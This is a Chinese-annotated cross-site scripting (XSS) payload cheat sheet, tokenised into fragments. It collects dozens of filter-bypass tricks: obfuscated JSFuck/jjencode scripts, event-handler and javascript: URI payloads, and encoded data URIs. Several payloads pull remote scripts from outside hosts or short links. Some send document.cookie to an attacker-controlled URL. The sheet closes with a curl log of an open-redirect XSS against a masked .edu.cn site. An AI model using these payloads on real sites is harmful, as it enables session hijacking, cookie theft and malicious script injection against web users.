-
<
script
>
alert
(
0
)</
script
>
-
<
script
>
confirm
(
1
)</
script
>
-
<
script
>
prompt
(
2
)</
script
>
-
<
script
>
\u
0061
\u
006C
\u
0065
\u
0072
\u
0074
(
3
)</
script
>
-
<
script
>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</
script
>
-
<
script
>
$
=~[];
$
={
___
:++
$
,
$$$$
:(![]+
""
)[
$
],
__$
:++
$
,
$_$_
:(![]+
""
)[
$
],
_$_
:++
$
,
$_$$
:({}+
""
)[
$
],
$$_$
:(
$
[
$
]+
""
)[
$
],
_$$
:++
$
,
$$$_
:(!
""
+
""
)[
$
],
$__
:++
$
,
$_$
:++
$
,
$$__
:({}+
""
)[
$
],
$$_
:++
$
,
$$$
:++
$
,
$___
:++
$
,
$__$
:++
$
};
$
.
$_
=(
$
.
$_
=
$
+
""
)[
$
.
$_$
]+(
$
.
_$
=
$
.
$_
[
$
.
__$
])+(
$
.
$$
=(
$
.
$
+
""
)[
$
.
__$
])+((!
$
)+
""
)[
$
.
_$$
]+(
$
.
__
=
$
.
$_
[
$
.
$$_
])+(
$
.
$
=(!
""
+
""
)[
$
.
__$
])+(
$
.
_
=(!
""
+
""
)[
$
.
_$_
])+
$
.
$_
[
$
.
$_$
]+
$
.
__
+
$
.
_$
+
$
.
$
;
$
.
$$
=
$
.
$
+(!
""
+
""
)[
$
.
_$$
]+
$
.
__
+
$
.
_
+
$
.
$
+
$
.
$$
;
$
.
$
=(
$
.
___
)[
$
.
$_
][
$
.
$_
];
$
.
$
(
$
.
$
(
$
.
$$
+
"\""
+
$
.
$_$_
+(![]+
""
)[
$
.
_$_
]+
$
.
$$$_
+
"\\"
+
$
.
__$
+
$
.
$$_
+
$
.
_$_
+
$
.
__
+
"("
+
$
.
$_$
+
")"
+
"\""
)())();</
script
>
-
<
script
>+
alert
(
6
)</
script
>
-
<
script test
>
alert
(
7
)</
script
>
-
<
script
>
alert
(/
8
/)</
script
>
-
<
script src
=
data
:
text
/
javascript
,
alert
(
9
)></
script
>
-
<
script src
=
data
:
text
/
javascript
,
alert
(
10
)></
script
>
-
<
script
>
alert
(
String
.
fromCharCode
(
49
,
49
))</
script
>
-
<
script
>
alert
(/
12
/.
source
)</
script
>
-
<
script
>
setTimeout
(
alert
(
13
),
0
)</
script
>
-
<
script
>
document
[
'write'
](
14
);</
script
>
-
<
anytag onmouseover
=
alert
(
15
)>
M
-
<
anytag onclick
=
alert
(
16
)>
M
-
<
a onmouseover
=
alert
(
17
)>
M
-
<
a onclick
=
alert
(
18
)>
M
-
<
a href
=
javascript
:
alert
(
19
)>
M
-
<
button
/
onclick
=
alert
(
20
)>
M
-
<
form
><
button formaction
=
javascript
:
alert
(
21
)>
M
-
<
form
/
action
=
javascript
:
alert
(
22
)><
input
/
type
=
submit
>
-
<
form onsubmit
=
alert
(
23
)><
button
>
M
-
<
img src
=
x onerror
=
alert
(
24
)>
-
<
img src
=
x onError
=
alert
(
24
)>
大写
bypass
某些过滤
-
<
body
/
onload
=
alert
(
25
)>
-
<
body onscroll
=
alert
(
26
)><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
input autofocus
>
-
<
iframe src
=
j
-
a
-
v
-
a
-
s
-
c
-
r
-
i
-
p
-
t
-
:
a
-
l
-
e
-
r
-
t
-
%
28
-
27
-
%
29
></
iframe
>
-
<
iframe src
=
"http://0x.lv/xss.swf"
></
iframe
>
-
<
iframe
/
onload
=
alert
(
document
.
domain
)></
iframe
>
-
<
IFRAME SRC
=
"javascript:alert(29);"
></
IFRAME
>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E"
>
-
<
object data
=
data
:
text
/
html
;
base64
,
PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ
+></
object
>
-
<
object data
=
"javascript:alert(document.domain)"
>
-
<
marquee onstart
=
alert
(
30
)></
marquee
>
-
<
isindex type
=
image src
=
1
onerror
=
alert
(
31
)>
-
<
isindex action
=
javascript
:
alert
(
32
)
type
=
image
>
-
<
input onfocus
=
alert
(
33
)
autofocus
>
-
<
input onblur
=
alert
(
34
)
autofocus
><
input autofocus
>
-
<
INPUT TYPE
=
"IMAGE"
SRC
=
x onerror
=
alert
(
35
)>
-
<
select onfocus
=
alert
(
36
)
autofocus
>
-
<
textarea onfocus
=
alert
(
37
)
autofocus
></
textarea
>
-
<
keygen onfocus
=
alert
(
38
)
autofocus
>
-
<
FRAMESET
><
FRAME SRC
=
"javascript:alert(document.domain);"
></
FRAMESET
>
-
<
frameset onload
=
alert
(
40
)>
-
<
embed src
=
"data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
></
embed
>
-
<
embed src
=
javascript
:
alert
(
document
.
domain
)>
-
<
math href
=
"javascript:alert(45)"
>
M
-
<
math
>
<
maction actiontype
=
""
xlink
:
href
=
"javascript:alert(46)"
>
M
-
<
math xlink
:
href
=
javascript
:
alert
(
47
)>
M
-
<
img src
=
x onerror
=
"var s=document.createElement('script');s.src="
这里填
js
地址
";document.body.appendChild(s);"
>
-
domain
=
javascript
:
location
.
href
=
alert
(
document
.
cookie
)//
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var b
=
document
.
createElement
(
"script"
);
b
.
src
=
"http://xssnow.com/zuVV?"
+
Math
.
random
();(
document
.
getElementsByTagName
(
"HEAD"
)[
0
]||
document
.
body
).
appendChild
(
b
);/.
source
));//>
-
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var b
=
document
.
createElement
(
"script"
);
b
.
src
=
"http://www.woshimaisaike.com/oWaKwi"
;(
document
.
getElementsByTagName
(
"HEAD"
)[
0
]||
document
.
body
).
appendChild
(
b
);/.
source
));//>
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var
%
20b
%
3Ddocument
.
createElement
%
28
%
22script
%
22
%
29
%
3Bb
.
src
%
3D
%
22http
%
3A
%
2F
%
2Fwww
.
woshimaisaike
.
com
%
2FoWaKwi
%
22
%
3B
%
28document
.
getElementsByTagName
%
28
%
22HEAD
%
22
%
29
%
5B0
%
5D
%
7C
%
7Cdocument
.
body
%
29.appendChild
%
28b
%
29
%
3B
/.
source
));//><//实际提交时需要使用这条,需要
url
编码>
-
伪协议:
ed2k
://|
file
|
test
|
'+alert(document.cookie)+'
|
test
/
-
[
url
=<
a id
=
"ed2k_T7V"
href
=
"ed2k://|file|test|'+alert(document.cookie)+'|test/"
target
=
"_blank"
>
1
</
a
>]
2
[/
url
]
-
<
svg
/
onload
=
document
.
body
.
appendChild
(
createElement
(/
script
/.
source
)).
src
=
String
.
fromCharCode
(
47
,
47
,
116
,
46
,
99
,
110
,
47
,
56
,
115
,
56
,
103
,
101
,
74
,
86
)
-
-
<
svg xmlns
=
"url"
><
g onload
=
"javascript:alert(1)"
></
g
></
svg
>
-
如果只允许()[]!+
$
,那么可以使用
JSFCUK
,
JSOTHER
,
jjencode
、
aaencode
.
-
<
script
>
eval
(
'document.write("<\163cript/src=http://is.gd/grcGnF></\163cript>")'
);</
script
>
-
<
div style
=
"display:none"
><
img title
=
"with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'"
style
=
"" onerror=eval(this.title) src=x"
></
div
>
-
<
a href
=
"javasc
-
ript:jQuery.getScript('//xss.**/****')"
>点击查看详情</
a
>//<在<
script
>和
javascript
等字符串中间会加上<
x
>,即变成<
scr
<
x
>
ipt
>和
java
<
x
>
script
,但是这里把
javascript
中间插入换行符(即
table
或者回车键)就可以绕过了><用
jQuery
.
getScript
执行外部
js
>//需要具体环境
-
<
a href
=
"javasc
-
ript:alert(/xss/)"
>点击查看详情</
a
><
-
要换成
tabale
或者回车><注意:
firefox
不可以,
chrome
可以>
-
<
img width
=
0
height
=
0
onerror
=
" var NagvIw1 = window['document']['getElementsByTagName']('HEAD')['item'](0);var LVdmojAqt2 = window['document']['createElement']('script');LVdmojAqt2['type'] = 'text/javascript';LVdmojAqt2['src'] = '*****.js';NagvIw1['appendChild'](LVdmojAqt2);"
src
=
"1"
/>
-
<
img src
=
x onerror
=
document
.
body
.
appendChild
(
createElement
(/
script
/.
source
)).
src
=
alt alt
=//
km3
.
pw
>
-
<
a
href
=
javascript
:
alert
(
document
.
cookie
)><
img
src
=
XXXX
.
png
></
a
>
<
a
>与<
img
>标签配合使用,会在<
a
>标签内插入一张图片,点击图片则触发<
a
>标签
-
<
img src
=
x onerror
=
d
=
document
;
e
=
d
.
createElement
(
'script'
);
e
.
src
=
'http://127.0.0.1/eXploit.js'
;
d
.
body
.
appendChild
(
e
);>
-
<
svg
/
onload
=
prompt
(
1
)>
-
未来所有的浏览器支持
ES6
,所以可以使用下面两个
payload
:<
script
>
eval
.
call
`
$
{
'prompt\x281)'
}`</
script
>,<
script
>
eval
.
call
`
$
{
'prompt\x281)'
}`</
script
>
-
<
input value
=
""
onresize
=
"prompt(1)"
type
=
"text"
>
//
IE10
下有效
在
IE10
下,当页面第一次加载时,会调用
resize
事件
-
<
p
class
=
"comment"
title
=
""
onload
=
'prompt(1)'"></p>
-
<input value="" type=image src onerror=
-
"
prompt
(
1
)
" type="
text
">
-
<img src=x onerror=x={png:1};(function(){alert(location.href)})(x //不能注释时使用闭合,构造后为:<img src=x onerror=x={png:1};(function(){alert(location.href)})(x).png>
-
<img src=x top.onerror=alert(1)/>
-
<img src=x onerror=top["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src=x onerror=self["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src=x onerror=parent["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src="
x
" onerror="
$
[
'\147\145\164S\143\162\151\160\164'
](
'\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66'
)
"><通过jquery>
-
<img src="
x
" onerror="
[].
constructor
.
constructor
(
'aler\164(1)'
)()
">
-
<video src=http://www.baidu.com/img/bd_logo1.png onprogress=document.body.appendChild(document.createElement(/script/.source)).src=id id=//qqq.si/CVuD63>
-
<img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
-
<video src=http://www.baidu.com/img/baidu_jgylogo3.gif onprogress=$['get\123cript']('http://w.s.js')>
-
<img src=x
-
onerror
-
=alert(1)> 利用换行绕过
-
javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source)) 用//.source代替引号
-
<!--[if true]><img onerror=alert(1) src=--><form
-
action=javascript:alert(2)><input type=submit><input
-
autofocus onfocus=alert(3)><select autofocus
-
onfocus=alert(4)><textarea autofocus onfocus=alert(5)><HTML5特性>
-
<span style="
background
-
color
:
expression
(
alert
(
1
));
">
-
On/focus/=/"
/
alert
/(/
docu
/
ment
/.
cook
/
ie
/)
用/分隔关键字绕过
-
<
img width
=
"540"
height
=
"258"
style
=
"xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})"
src
=
"http://www.baidu.com/img/bd_logo1.png"
data_ue_src
=
"http://www.baidu.com/img/bd_logo1.png"
>
-
t
<!---><
form
><
button
+
formaction
%
3djavascript
%
3aalert
(
1
)+
autofocus
+/>
te
-
t
<!---><
form
><
button formaction
=
javascript
:
alert
(
1
)
autofocus
/>
te
-
<
img src
=
3D
# style=3D"display:none" onerror=3Dalert(0)> 3D绕过
-
<
link rel
=
import
href
=
http
://
xxx
/
xxx
.
html
>
36
版
chrome
最新支持
-
<
vmlframe xmlns
=
"urn:schemas-microsoft-com:vml"
style
=
"behavior:url(#default#vml);position:absolute;width:100%;height:100%"
src
=
"http://itsokla.duapp.com/shouzi.vml#xss"
></
vmlframe
>
-
<
img src
=
x onerror
=
eval
(
location
.
hash
.
slice
(
1
))>
-
<
video src
=
'//dwz.cn/zNNYd'
onsuspend
=
alert
(
1
)>
-
<
img
/
src
=
'x'
/
onerror
=
alert
(
1
)//
-
<!--[
if
true
]><
img onerror
=
alert
(
1
)
src
=--><
form action
=
javascript
:
alert
(
2
)><
input type
=
submit
><
input autofocus onfocus
=
alert
(
3
)><
select autofocus onfocus
=
alert
(
4
)><
textarea autofocus onfocus
=
alert
(
5
)>
-
<
form id
=
"test"
></
form
><
button form
=
"test"
formaction
=
"javascript:alert(1)"
>
X
</
button
>
<
form id
=
"test"
></
form
><
button form
=
"test"
formaction
=
"javas
-
cript:alert(1)"
>
X
</
button
>
html5
新增的实体命名编码:
-
换行实现绕过
-
<
img onreadystatechange
=
"alert(/xss/)"
src
=
x
>
-
<
img src
=
x onerror
=
alert
(/
xss
/)>
-
<
iframe src
=
"javascript:confirm(2)"
></
iframe
>
-
<
iframe src
=
"javascript:alert(/xss/)"
style
=
"display:none"
></
iframe
>
-
<
a xlink
:
href
=
javascript
:
alert
(
document
.
cookie
)>
-
<
svg
><
animateTransform attributeName
=
transform onbegin
=
alert
(
2
)>
-
<
fremeser onload
=
alert
(
1
)/>
-
<
marquee onstart
=
alert
(
2
)></
marquee
>
-
<
animateTransform attributeName
=
transform onbegin
=
alert
(
1
)>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E"
>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E"
>
-
<
a href
=
"java
-
script:alert(document.cookie)"
>
xx
</
a
>
-
<
a href
=
"java
-
script:alert(document.cookie)"
>
xx
</
a
>
-
?
id
=<
svg
/
onload
=
$
.
getScript
(
'//website/xxx.js'
)>
-
?
id
=<
svg
/
onload
=
eval
(
location
.
hash
.
substr
(
1
))>#
YourJSCode
-
<
svg
/
onload
=
location
.
href
=
"//yourdomain.com/record.php?"
+
escape
(
document
.
cookie
)></
svg
>
-
<
svg
/
onload
=
name
=
document
.
cookie
.
toString
()></
svg
>
-
<
svg
/
onload
=
postMessage
(
document
.
body
.
innerHTML
,
'*'
);></
svg
>
-
<
iframe src
=
"target.html?xsscode=<svg/onload=eval(name)></svg>"
name
=
"document.write('xss payload')"
/>
-
<
svg
/
onload
=
document
.
write
(
"\x3cscript/src=http://abcd.com/xss.js\x3e\x3c/script\x3e"
)></
svg
>
-
<
script
/
src
=//
18.gy
>
//
xss
短链接
20
字符
-
<
img src
=
6
onerror
=
s1
=
'scri'
;
s2
=
'pt'
;
s
=
createElement
(
s1
+
s2
);
body
.
appendChild
(
s
);
s
.
src
=
'http://t.cn/RUsPCEK'
;//////;-------->
-
绕过关键字
script
以及对>进行编码
-
<
svg
><
use xlink
:
href
=
"data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle"
/></
svg
>
保存为
1.htm
作为附件发送给对方,然后对方预览
-
}</
style
><
script
>
alert
(/
xss
/)</
在
DOC
文档字体中插入
-
<
svg
><
animateTransform attributeName
=
transform dur
=
1s
onend
=
alert
(
1
)>
-
Concat
绕过长度限制:
-
<
htmnl
>
-
<
head
></
head
>
-
<
body
>
-
-
<
a onmouseover
=
"a='http:'"
>
a9
</
a
>
-
<
a onmouseover
=
"s=String.fromCharCode"
>
a10
</
a
>
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a11
</
a
>//用
String
.
fromCharCode
将
47
转换成字符/,然后用
concat
拼接到
a
上
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a12
</
a
>
-
<
a onmouseover
=
"a=a.concat('is.gd')"
>
a13
</
a
>
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a14
</
a
>
-
<
a onmouseover
=
"a=a.concat('lFYAxW')"
>
a15
</
a
>
-
<
a onmouseover
=
"r='script'"
>
a2
</
a
>
-
<
a onmouseover
=
"d=document"
>
a3
</
a
>
-
<
a onmouseover
=
"n=d.createElement(r)"
>
a4
</
a
>
-
<
a onmouseover
=
"n.src=a"
>
a5
</
a
>
-
<
a onmouseover
=
"h=d.body"
>
a6
</
a
>
-
<
a onmouseover
=
"h.appendChild(n)"
>
a7
</
a
>
-
</
body
>
-
</
html
>
-
+号拼接绕过长度限制
-
<
htmnl
>
-
<
head
></
head
>
-
<
body
>
-
-
<
a onmouseover
=
"a='http:'"
>
a9
</
a
>
-
<
a onmouseover
=
"a=a+'//is.gd'"
>
a9
</
a
>
-
<
a onmouseover
=
"a=a+'/lFYAxW'"
>
a9
</
a
>
-
<
a onmouseover
=
"r='script'"
>
a2
</
a
>
-
<
a onmouseover
=
"d=document"
>
a3
</
a
>
-
<
a onmouseover
=
"n=d.createElement(r)"
>
a4
</
a
>
-
<
a onmouseover
=
"n.src=a"
>
a5
</
a
>
-
<
a onmouseover
=
"h=d.body"
>
a6
</
a
>
-
<
a onmouseover
=
"h.appendChild(n)"
>
a7
</
a
>
-
</
body
>
-
</
html
>
FLASHxss
-
<
embed src
=
"http://cm2.in/xss.swf"
allownetworking
=
"all"
-
allowscriptaccess
=
"always"
>
不常见的on事件,可能可以绕过过滤,
-
fscommand
-
onbegin
-
ondragdrop
-
onend
-
onhashchange
-
oninput
-
onmediacomplete
-
onmediaerror
-
onmessage
-
onoffline
-
onoutofsync
-
onpause
-
onpopstate
-
onprogress
-
onredo
-
onrepeat
-
onresume
-
onreverse
-
onrowsenter
-
onrowdelete
-
onrowinserted
-
onseek
-
onstorage
-
onsyncrestored
-
ontimeerror
-
ontrackchange
-
onundo
-
onurlflip
-
seeksegmenttime
-
$ curl
-
v
"http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
-
*
Trying
127.0
.
0.1
...
-
*
Connected
to
127.0
.
0.1
(
127.0
.
0.1
)
port
1080
(#
0
)
-
>
GET http
://****.
edu
.
cn
/
go
.
asp
?
url
=
javascript\u
003aeval
(
location
.
hash
.
slice
(
1
))
HTTP
/
1.1
-
>
User
-
Agent
:
curl
/
7.41
.
0
-
>
Host
:
****.
edu
.
cn
-
>
Accept
:
*/*
-
>
Proxy
-
Connection
:
Keep
-
Alive
-
>
-
<
HTTP
/
1.1
200
OK
-
<
Connection
:
close
-
<
Date
:
Mon
,
27
Jun
2016
06
:
13
:
31
GMT
-
<
Server
:
Microsoft
-
IIS
/
6.0
-
<
X
-
Powered
-
By
:
ASP
.
NET
-
<
Content
-
Length
:
113
-
<
Content
-
Type
:
text
/
html
-
<
Set
-
Cookie
:
ASPSESSIONIDCCTTQQQQ
=
KLNDIOEAOHCIMEMFJMOOMCHN
;
path
=/
-
<
Cache
-
control
:
private
-
<
Proxy
-
Connection
:
keep
-
alive
-
<
-
-
<
script language
=
"javascript"
>
-
window
.
location
.
href
=
"javascript\u003aeval(location.hash.slice(1))"
;
-
</
script
>*
Closing
connection
0
-
限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如url=javascript:alert(1);会被拦截,但可以用JS编码绕过。